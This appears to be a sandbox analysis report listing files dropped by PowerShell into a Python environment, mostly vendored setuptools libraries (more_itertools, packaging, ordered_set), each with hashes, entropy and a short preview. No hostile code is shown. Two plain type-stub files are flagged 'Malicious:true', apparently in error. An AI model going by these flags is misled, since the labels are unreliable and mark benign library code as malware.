                                                                                                                                                                                                                              SHA-256:BE699A2015CC407B839A30959681C8AAA433E952E75E042117655441DDEEE9C2
                                                                                                                                                                                                                              SHA-512:A38CEAB96DA6A8D79627514F7A64DB0BB4B5106BC7D40155C7078C4D45428F2E1AE0969AFB7E283750CEFD69F8608322511602E1908AC50C3BCA0DCCA7C4B896
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfR...............................d.d.l.....d.d.l.....d.Z.y.)......)...*z.8.8.0N)...more..recipes..__version__........[C:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/more_itertools/__init__.py..<module>r........s....................r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):138022
                                                                                                                                                                                                                              Entropy (8bit):5.538599737602545
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:9EwNhRArv8x7vBj4u5lQ0GmHdyhP4JJXfvP8Obi6B8PZfz5tNi5MfN6NC9Vm2ZyU:958yB5rE613klXNfN6aFQhFVkNMZK
                                                                                                                                                                                                                              MD5:4830048B6FF80DF2FED1510991B443E6
                                                                                                                                                                                                                              SHA1:AA8082AE3CC27CB6AB6363F85589A50B323AAC08
                                                                                                                                                                                                                              SHA-256:311D442FD2FF3D8F42DA7B9353556DDCD9D3520417A6CD91803241BDC77C37B1
                                                                                                                                                                                                                              SHA-512:DFDFF33450CBA5C0DEC663E999E360EEA1C8DE4FAEF1AA5E38402B44673AFDA8ED2DD2F3FC39FF04B8D0210E765358AF9E81D31622D2BC1A64FC79DFED627DC7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"..d.d.l#m$Z$m%Z%..d.d.l&m&Z&m'Z'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l/m0Z0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:..g.d...Z;..e<........Z=dxd...Z>e=f.d...Z?e=f.d...Z@e=f.d...ZA..G.d...d.........ZBd...ZCd...ZDd...ZEd...ZFd...ZGdyd...ZHdzd...ZId{d...ZJd...ZKd|d ..ZLd!..ZMdxd"..ZN..G.d#..d$........ZOd{d%..ZPd&..ZQd'..ZRdyd(..ZSd}d)..ZTdxd*..ZUd~d+..ZVd.d,..ZWd.d-..ZXd.d...ZYd/..ZZd.d0..Z[dzd1..Z\d2..Z]d.d3..Z^..G.d4..d5e_........Z`d6..Zad7..Zbd.d.d8..d9..Zcd.d;..Zdd<..Zed=..Zfegehf.f.d>..Zid{d?..Zjd}d@..Zk..G.dA..dBe.j...................e.j...........................ZmdzdC..ZndD..Zoepd.f.dE..ZqdF..ZrdG..ZsdH..Zt..G.dI..dJ........ZudK..ZvdL..ZwdM..f.dN..Zxe,f.d.dO..dP..Zy..G.dQ..dRe.........Zz..G.dS..dT........Z{..G.dU..dV........Z|epf.dW..Z}dX..Z~d:dY..Z.dydZ..Z.epd.f.d[..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21778
                                                                                                                                                                                                                              Entropy (8bit):5.477890682087111
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:RUJKeejJymYtzMtUr+4ZrvfDexjOPHsyUEHtNF3JoAMc0Jonw51B/Q:2KeejJFYtzMWlbexjOUyUCtNF3JoAMc5
                                                                                                                                                                                                                              MD5:9B92B36587D7C5BEB8DD4F7F79B3F661
                                                                                                                                                                                                                              SHA1:88429F2996F0B0061033F3138A92FA8F32FD91FE
                                                                                                                                                                                                                              SHA-256:D028559732484947878477ECA3A2C227C9D512278188B098E94F8CAEC8D8992D
                                                                                                                                                                                                                              SHA-512:2EB136570E331B4638271E62A4CD90441E60FE31DE8E8018CDE027D3B918D55A24954EB3229B103CCE65B5D5F698A97DF0CF509CDC66BEFC3955A11CF34A6816
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf.?.............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...g.d...Z.d...Z.d'd...Z.d...Z.d(d...Z.d(d...Z.d...Z.e.f.d...Z.d...Z.e.Z.d...Z.d...Z d...Z!d(d...Z"d...Z#..d.d.l.m$Z%..d...Z$e#j...................e$_.........d(d...Z'd...Z(d...Z)d...Z*d(d...Z+d(d...Z,d(d...Z-d)d...Z.d.d...d ..Z/d(d!..Z0d"..Z1d#..Z2d$..Z3d%..Z4d&..Z5y.#.e&$.r...e#Z$Y..@w.x.Y.w.)*a....Imported from the recipes section of the itertools documentation...All functions taken from the recipes section of the itertools library docs.[1]_..Some backward-compatible usability improvements have been made..... [1] http://docs.python.org/library/itertools.html#recipes.......N)...deque)...chain..combinations..count..cycle..groupby..islice..repeat..starmap..tee..zip_longest)...randrange..sample..choice)...all_equal..consume..convolve..dotproduct..first_true..flatten..grouper..iter_except..ncycles..nth..nth_combination..padnone..pad_none..pairwise..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):117959
                                                                                                                                                                                                                              Entropy (8bit):4.531260818409205
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:gZRx6HrvF7W4NxxBWwlvNKOIi64PvfL5ZF1Czom2ZyiUgg/duOXpKHpfQ3v9X:mWjD/Fn9Q3v9X
                                                                                                                                                                                                                              MD5:864C5EF9670735EF2541A8635254C1AE
                                                                                                                                                                                                                              SHA1:1013C2C5304D4769F71299F1A96360F17FAC77D8
                                                                                                                                                                                                                              SHA-256:D2B07F9A26C5479D6CAB7DD494023F6D67DA35DB1836726BD6FE92D02696ED00
                                                                                                                                                                                                                              SHA-512:1C12B5AD9F0DA2BB4916609215C5595A24B97EAD6041121DCCE1DCEB37C0960F232354D46EAE2224E15A8BC772995D8720EB72DAC60E59BF63BA93622182436D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import warnings..from collections import Counter, defaultdict, deque, abc.from collections.abc import Sequence.from functools import partial, reduce, wraps.from heapq import merge, heapify, heapreplace, heappop.from itertools import (. chain,. compress,. count,. cycle,. dropwhile,. groupby,. islice,. repeat,. starmap,. takewhile,. tee,. zip_longest,.).from math import exp, factorial, floor, log.from queue import Empty, Queue.from random import random, randrange, uniform.from operator import itemgetter, mul, sub, gt, lt.from sys import hexversion, maxsize.from time import monotonic..from .recipes import (. consume,. flatten,. pairwise,. powerset,. take,. unique_everseen,.)..__all__ = [. 'AbortThread',. 'adjacent',. 'always_iterable',. 'always_reversible',. 'bucket',. 'callback_iter',. 'chunked',. 'circular_shifts',. 'collapse',. 'collate',. 'consecutive_groups',. 'consumer',. 'countable',. 'c
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14977
                                                                                                                                                                                                                              Entropy (8bit):4.806947894856732
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:CIO2A02e3Q3VYe7bEwFn/xFw57SfEAL2alCTl8x3T90GqCN0wW6eeSdceWceGBk3:CCb2KcVYe7bEwFn/xFO7SfEAL2alCTlA
                                                                                                                                                                                                                              MD5:AE17D56D0AB6C18B24E40EBEB88EB89D
                                                                                                                                                                                                                              SHA1:28B6EA43040049E32202AD1493513B34DE9BBCAE
                                                                                                                                                                                                                              SHA-256:AF7DA91F6ADA042D738A1DDEBCAE1FCAF017BEB51A989A9CE9D815ED00912FF3
                                                                                                                                                                                                                              SHA-512:7E68AFBB06B886549D56E9B951044C8AC1895588926274E665735035D4A4523B03EB4DD33209F488C5FFE4248E94719BC6F521BE213942ACA048D2F6D3987568
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Stubs for more_itertools.more"""..from typing import (. Any,. Callable,. Container,. Dict,. Generic,. Hashable,. Iterable,. Iterator,. List,. Optional,. Reversible,. Sequence,. Sized,. Tuple,. Union,. TypeVar,. type_check_only,.).from types import TracebackType.from typing_extensions import ContextManager, Protocol, Type, overload..# Type and type variable definitions._T = TypeVar('_T')._U = TypeVar('_U')._V = TypeVar('_V')._W = TypeVar('_W')._T_co = TypeVar('_T_co', covariant=True)._GenFn = TypeVar('_GenFn', bound=Callable[..., Iterator[object]])._Raisable = Union[BaseException, 'Type[BaseException]']..@type_check_only.class _SizedIterable(Protocol[_T_co], Sized, Iterable[_T_co]): .....@type_check_only.class _SizedReversible(Protocol[_T_co], Sized, Reversible[_T_co]): .....def chunked(. iterable: Iterable[_T], n: int, strict: bool = ....) -> Iterator[List[_T]]: ....@overload.def first(iterable: Iterable[_T]) -> _T: ....@overload
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16256
                                                                                                                                                                                                                              Entropy (8bit):4.649568719740026
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:nJvwMGuByXxvVefdob4QZrkIeO7uTq93m793JU17sHfnb:JIM5sxvqQteO7H9i3JB/b
                                                                                                                                                                                                                              MD5:C8A83456168FD5ED99ADAD1584A86B10
                                                                                                                                                                                                                              SHA1:8E9E687648CD83E7D298EA05F013C9712EEFCBC4
                                                                                                                                                                                                                              SHA-256:524364AEC672AA2C202C700D0539AF3210AF68D4AF48D621C8EA73FC9739E436
                                                                                                                                                                                                                              SHA-512:343624B6B3647B3034B990D4C113F93149C5608F0D8E600325F61A4DC8FB3BB2B8C64ED7B8DFC79A959D2662263081D7A44757896FDDD5F683B69AB2448EB55F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Imported from the recipes section of the itertools documentation...All functions taken from the recipes section of the itertools library docs.[1]_..Some backward-compatible usability improvements have been made..... [1] http://docs.python.org/library/itertools.html#recipes..""".import warnings.from collections import deque.from itertools import (. chain,. combinations,. count,. cycle,. groupby,. islice,. repeat,. starmap,. tee,. zip_longest,.).import operator.from random import randrange, sample, choice..__all__ = [. 'all_equal',. 'consume',. 'convolve',. 'dotproduct',. 'first_true',. 'flatten',. 'grouper',. 'iter_except',. 'ncycles',. 'nth',. 'nth_combination',. 'padnone',. 'pad_none',. 'pairwise',. 'partition',. 'powerset',. 'prepend',. 'quantify',. 'random_combination_with_replacement',. 'random_combination',. 'random_permutation',. 'random_product',. 'repeatfunc',. 'roundrobin',
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3551
                                                                                                                                                                                                                              Entropy (8bit):4.8174321267851274
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:AWlUW3pHpjmNWtCWt0s9zW64I94IQ4xX4xIAhYW6FwFYUGMIk2M5eae3WREC:AXyJjmNICI0s9zPZp25hYdFwFzjzgae+
                                                                                                                                                                                                                              MD5:D891108075221B7F014E9A996E42263B
                                                                                                                                                                                                                              SHA1:AF29ACB2935E84E430AAA34A550B6FD6850D07EE
                                                                                                                                                                                                                              SHA-256:F41A5E29DE7FA9A9585529EE1DFA8F4827E81A0AA7418D97BBDA4DC2B0E51D4F
                                                                                                                                                                                                                              SHA-512:6F04AABC0784493F7D114E5531EFC8F848EA63852ACAC9A033B29960117E18ED79AD9ACE9C4BD18213B2601F8116498A8C55FEC1BD730F9C41F73C07E6AD499F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Stubs for more_itertools.recipes""".from typing import (. Any,. Callable,. Iterable,. Iterator,. List,. Optional,. Tuple,. TypeVar,. Union,.).from typing_extensions import overload, Type..# Type and type variable definitions._T = TypeVar('_T')._U = TypeVar('_U')..def take(n: int, iterable: Iterable[_T]) -> List[_T]: ....def tabulate(. function: Callable[[int], _T], start: int = ....) -> Iterator[_T]: ....def tail(n: int, iterable: Iterable[_T]) -> Iterator[_T]: ....def consume(iterator: Iterable[object], n: Optional[int] = ...) -> None: ....@overload.def nth(iterable: Iterable[_T], n: int) -> Optional[_T]: ....@overload.def nth(iterable: Iterable[_T], n: int, default: _U) -> Union[_T, _U]: ....def all_equal(iterable: Iterable[object]) -> bool: ....def quantify(. iterable: Iterable[_T], pred: Callable[[_T], bool] = ....) -> int: ....def pad_none(iterable: Iterable[_T]) -> Iterator[Optional[_T]]: ....def padnone(iterable: Iterable[_T]) -> Iterator[Opti
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15130
                                                                                                                                                                                                                              Entropy (8bit):4.235131026628033
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:X2zYoms8Wwi0uImzOKgW173/wiy/VDZa9ebTzVEbjym:hobwinkKlQ9I9ebTzVEbjym
                                                                                                                                                                                                                              MD5:F3186384F56969ACBD47DD1E14431FD0
                                                                                                                                                                                                                              SHA1:E036FB43B3FDB55291BB33008B375B4D9465C09C
                                                                                                                                                                                                                              SHA-256:75B68272CDBB77237D827316185E6703F06B567E90F8DAE329826957DFDF801B
                                                                                                                                                                                                                              SHA-512:99A0BF021448F74031C8A9ED7950C6EBE8E4134D537DA42774D500131F285CFE842E198150731DEA9BBE249E443364C9D79D3A18F530A8789C0A7F3A4B0FDE24
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".An OrderedSet is a custom MutableSet that remembers its order, so that every.entry has an index that can be looked up...Based on a recipe originally posted to ActiveState Recipes by Raymond Hettiger,.and released under the MIT license..""".import itertools as it.from collections import deque..try:. # Python 3. from collections.abc import MutableSet, Sequence.except ImportError:. # Python 2.7. from collections import MutableSet, Sequence..SLICE_ALL = slice(None).__version__ = "3.1"...def is_iterable(obj):. """. Are we being asked to look up a list of things, instead of a single thing?. We check for the `__iter__` attribute so that this can cover types that. don't have to be known by this module, such as NumPy arrays... Strings, however, should be considered as atomic values to look up, not. iterables. The same goes for tuples, since they are immutable and therefore. valid entries... We don't need to check for the Python 2 `unicode` type, because i
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):496
                                                                                                                                                                                                                              Entropy (8bit):4.8736183147149905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:qD+6O0vgEVhO17k7G/E4ZqQ9590/be2UHVjuEF/mBcvNrHY7Z:q9O0opw7hQ953DR/mBclY7Z
                                                                                                                                                                                                                              MD5:C67399C99BA4B3A8362EC2B4DC26CD35
                                                                                                                                                                                                                              SHA1:CDA9FC9E042353DC508D3904B62A402E7530A049
                                                                                                                                                                                                                              SHA-256:533A2D715D3BA7CBDC27377CD12F96D2CAE1818F0D3150FF5EF25C67B24DFAD0
                                                                                                                                                                                                                              SHA-512:DF8ED5D1927BE933FA78CA79A2B04D41DE420084381D2F0F2F5419826DF00A80651EF81DA4516DAC0A8BD0A3A1EAFD32FAE60853CD18F6C627AE43C34BA3B39D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...__title__ = "packaging".__summary__ = "Core utilities for Python packages".__uri__ = "https://github.com/pypa/packaging"..__version__ = "24.0"..__author__ = "Donald Stufft and individual contributors".__email__ = "donald@stufft.io"..__license__ = "BSD-2-Clause or Apache-2.0".__copyright__ = "2014 %s" % __author__.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):548
                                                                                                                                                                                                                              Entropy (8bit):5.706898688696527
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:W/CSsdRhu2qQ95CG0/4aZ9uBcvNzbZg4URA73WBGKNxVltQcjajrq6Ml/:W6ld3AQ95quBcdZgHS79KNxfibjrq6Mt
                                                                                                                                                                                                                              MD5:E18BC0E429C985491308735F15E7A100
                                                                                                                                                                                                                              SHA1:CF24AA4A56BBDCBEA12934668DF434CDED0C8543
                                                                                                                                                                                                                              SHA-256:17923691B44EF99CB26318378B2DF9B2FA388AD58F4278C5051041A362690AC2
                                                                                                                                                                                                                              SHA-512:F8DF2794D77B6CAFE90557CE68928235D8161C9380032E5B595A5599AE0DEB1208C0846945E96BDCA8CC3133B4CBBDB7F5198A81C76E142B7B9BCD7ED13AA955
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................*.....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.e.z...Z.y.)...packagingz"Core utilities for Python packagesz!https://github.com/pypa/packagingz.24.0z)Donald Stufft and individual contributorsz.donald@stufft.ioz.BSD-2-Clause or Apache-2.0z.2014 %sN)...__title__..__summary__..__uri__..__version__..__author__..__email__..__license__..__copyright__........VC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/packaging/__init__.py..<module>r........s4.................2....-.........8.........*......J..&..r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5016
                                                                                                                                                                                                                              Entropy (8bit):5.267425667177716
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:427d0vOkei/duwsKxb3Udn8eobHN3syD3DgpS5m3:4sd0vOriVPdbGn8eARs+UH3
                                                                                                                                                                                                                              MD5:3317D20CBAEB05A7419560CE566E8E16
                                                                                                                                                                                                                              SHA1:BC70E4BA86B8B16E7D078ED26C6BE4E5AB0D30D6
                                                                                                                                                                                                                              SHA-256:8392F4CD92C6627277D09CAEC00FAF96CB5843E2443C6B1452B4C84FB44224F7
                                                                                                                                                                                                                              SHA-512:245A6A7DB8D2DDE2A2D05C12D614953C6168376DFED167E5A28024EA96D25F6828460D94C4600C4D38EBBAFF11D991AB1040956B1818472E89EBBE70BFB98A46
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.....G.d...d.e.........Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.........Z.y.).a;....ELF file parser...This provides a class ``ELFFile`` that parses an ELF executable in a similar.interface to ``ZipFile``. Only the read interface is implemented...Based on: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca.ELF header: https://refspecs.linuxfoundation.org/elf/gabi4+/ch4.eheader.html......N)...IO..Optional..Tuplec...........................e.Z.d.Z.y.)...ELFInvalidN)...__name__..__module__..__qualname__........VC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/packaging/_elffile.pyr....r........s.........r....r....c...........................e.Z.d.Z.d.Z.d.Z.y.)...EIClass..........N).r....r....r......C32..C64r....r....r....r....r...................C....Cr....r....c...............
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9896
                                                                                                                                                                                                                              Entropy (8bit):5.52913799576016
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:XSspFCSBtxQd0jE/zo+ghg7pZ/gTIKDRZBfTBpii:Xrvxe0YboN+pZADRZBfii
                                                                                                                                                                                                                              MD5:D76A58F770F5405595103974D57BE097
                                                                                                                                                                                                                              SHA1:A98DB26A8569D1E1B6449B10E5140D8CC9A7CA52
                                                                                                                                                                                                                              SHA-256:3D5DFF012DEDA41ACE7849D56A4180214F0E8EB48AB6ABD0EE53C0C6BE161162
                                                                                                                                                                                                                              SHA-512:B2ED4EDD95723BE0070CB1B02A94F81515A1522AAEE0C49A612524622BD65A514489320E6FED501A5F3870A2023B3DE08D65535D7A73EEB3DAE3B084C6E8452C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vfv%..............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.e.j...................d.e.d.e.e.e.....d.d.f.....f.d...........Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.e.....d.e.f.d...Z...e.j<..................d...........Z.e.e e f.....e!d.<.....G.d...d.e.........Z"d.e.e.....f.d...Z#d.e.e.....f.d...Z$d.e.e.....f.d...Z%d.e.d.e.e e f.....f.d...Z&..e.jN..........................d.e.e e f.....f.d...........Z(d.e.d.e"d.e.f.d...Z)d.d.d.d ..Z*d.e.e.....d.e.e.....f.d!..Z+y.)".....N)...Dict..Generator..Iterator..NamedTuple..Optional..Sequence..Tuple.....)...EIClass..EIData..ELFFile..EMachinel.......~..i....i......path..returnc................#.......K.......t.........|.d.........5.}.t.........|...............d.d.d...........y.#.1.s.w...Y.....y.x.Y.w.#.t.........t.........t.........f.$.r...d.......Y.y.w.x.Y.w...w.).N..rb)...openr......OSError..TypeError..ValueError).r......fs.... .XC:\
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4579
                                                                                                                                                                                                                              Entropy (8bit):5.6107184505763765
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:hVHy8osoiMSgE+nsMM3fdjxpj2vZ7eaVdpO2j:bH1DYGdavReaPpn
                                                                                                                                                                                                                              MD5:9DF9FF4E4230421DA0822D7070B5B8B1
                                                                                                                                                                                                                              SHA1:8ECE279D2AEFBDD75BDB9D7EF9226585D73ADE92
                                                                                                                                                                                                                              SHA-256:FB87B22916CFA6278020E317BEDF7DE81CDE496A519735F755712BD43D2ECDF5
                                                                                                                                                                                                                              SHA-512:913FD69A782CBF3F4E7196F78F61996E7AA2A77D4F31E190F64A2265C79B366DAA909560AD5B003673404AB0433AACDEC77CF754691E116B95D8DB135035D284
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vft...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.d.e.d.e.e.....f.d...Z...e.j...........................d.e.d.e.e.....f.d...........Z.d.e.e.....d.e.e.....f.d...Z.e.d.k(..r.d.d.l.Z...e.j(..........................Z.e.j-..................d.........s.J.d.............e.d.e.............e.d...e.e.j0......................................e.d.d...............e...e.j2..................d.d.e.j5..................d.d.........d.....................D.]...Z...e.e.d.................y.y.).z.PEP 656 support...This module implements logic to detect if the currently running Python is.linked against musl, and what musl version is used.......N)...Iterator..NamedTuple..Optional..Sequence.....)...ELFFilec.....................".....e.Z.d.Z.U.e.e.d.<...e.e.d.<...y.)..._MuslVersion..major..minorN)...__name__..__module__..__qualname__..int..__annotations__........XC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14054
                                                                                                                                                                                                                              Entropy (8bit):5.152464794416269
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:+ofis7NyCkRoexlz0xbRrhHzXxSJfwxOWTkp/4N/ziNjKgLB7OGd:+ofiEyC4vlzAbRxVSJEXC/4N/ziIS7J
                                                                                                                                                                                                                              MD5:1852138FCEA86D26F7E4F52805CF8160
                                                                                                                                                                                                                              SHA1:C2C89858297E6DD9D21F6D1F73E745EA8906FA39
                                                                                                                                                                                                                              SHA-256:C45E384D806BAE3F5835B5ED5A8B17ABCD4B6EE678417D1DE9EB8D188497819F
                                                                                                                                                                                                                              SHA-512:FB33B5771FDB9C5FEDDD8D4DC14EE23DBCDBFD626B132B4C6506F74D46290C7D1EBCF51BD3CB8522B93E5D921FD44A03DEE590E555A245920005DE157497F990
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vfk(..............................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.....G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.e.e.e.f.....Z.e.e.e.e.f.....Z.e.Z.e.e.....Z...G.d...d.e.........Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.e.e.e.e.....f.....f.d...Z.d.e.d.e.d.e.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z d.e.d.e.f.d...Z!d.e.d.e.f.d ..Z"d.e.d.e.f.d!..Z#d.e.d.e.f.d"..Z$d#e.d.e.f.d$..Z%d%e.d.e.f.d&..Z&d.e.d.e.f.d'..Z'y.)(z.Handwritten parser of dependency specifiers...The docstring for each __parse_* function contains ENBF-inspired grammar representing.the implementation.......N)...Any..List..NamedTuple..Optional..Tuple..Union.....)...DEFAULT_RULES..Tokenizerc.....................@.....e.Z.d.Z.d.e.d.d.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.y.)...Node..value..returnNc...........................|.|._.........y...N..r....)...selfr....s....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3231
                                                                                                                                                                                                                              Entropy (8bit):4.648450157453811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:8DTzw8hxB0ryvAWeRhbZDavnQ4bzwI/XFXlpj/4kE8P+XceYF6:CTVh7MnejL/1X4kAXcf6
                                                                                                                                                                                                                              MD5:B5E0608937CAAD10C0EC0CC8565BB79E
                                                                                                                                                                                                                              SHA1:670159E3303C5C2E2D1A042D6279B6F6C1769CCE
                                                                                                                                                                                                                              SHA-256:A92295A1AC6396222C1461C510E98D0B2031168DFB2881EE9E231D48E655A22A
                                                                                                                                                                                                                              SHA-512:2619B5CCD1858D40BA03F9DAE4FF53E18783020E86BD8B108805765D22F7EB3AA8A7B81F049A8AE86E4EE3DF35C96C54665EC0EBB102D8A82691C14A27494357
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................H.......G.d...d.........Z...e.........Z...G.d...d.........Z...e.........Z.y.).c..........................e.Z.d.Z.d.e.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.d.f.d...Z.y.)...InfinityType..returnc...........................y.).N..Infinity......selfs.... .YC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/packaging/_structures.py..__repr__z.InfinityType.__repr__....s..............c.....................*.....t.........t.........|.................S...N....hash..reprr....s.... r......__hash__z.InfinityType.__hash__...............D...J......r......otherc...........................y...NFr......r....r....s.... r......__lt__z.InfinityType.__lt__..............r....c...........................y.r....r....r....s.... r......__le__z.InfinityType.__le__....r....r....c...........................t.........|.|.j...........................S.r........isinstance..__class__r....s.... r..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7927
                                                                                                                                                                                                                              Entropy (8bit):5.516751287908305
